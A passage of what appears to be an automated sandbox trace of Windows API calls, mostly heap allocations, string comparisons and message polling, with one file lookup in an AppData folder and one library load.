lpString1="LRI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.914] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0198.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0198.914] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0198.914] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0198.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0198.914] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0198.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.914] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0198.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0198.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0198.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.915] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0198.915] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.915] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0198.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.915] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0198.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.915] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.915] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.915] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/GHNzGfsXtZO 6LRI5J.png", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4819ce50, ftCreationTime.dwHighDateTime=0x1d4c732, ftLastAccessTime.dwLowDateTime=0x81e40e10, ftLastAccessTime.dwHighDateTime=0x1d4cf35, ftLastWriteTime.dwLowDateTime=0x81e40e10, ftLastWriteTime.dwHighDateTime=0x1d4cf35, nFileSizeHigh=0x0, nFileSizeLow=0xc2ab, dwReserved0=0xa3a0039, dwReserved1=0x14d9e, cFileName="GHNzGfsXtZO 6LRI5J.png", cAlternateFileName="GHNZGF~1.PNG")) returned 0xaa57a0 [0198.916] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0198.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.957] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0198.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0198.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0198.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0198.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.958] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.958] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0198.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0198.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0198.958] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.959] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0198.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.959] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.959] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.960] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0198.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.960] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0198.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.960] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0198.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.961] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.961] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0198.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.962] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0198.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.963] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0198.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0198.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.964] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.964] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.964] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0198.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17f8 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.965] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 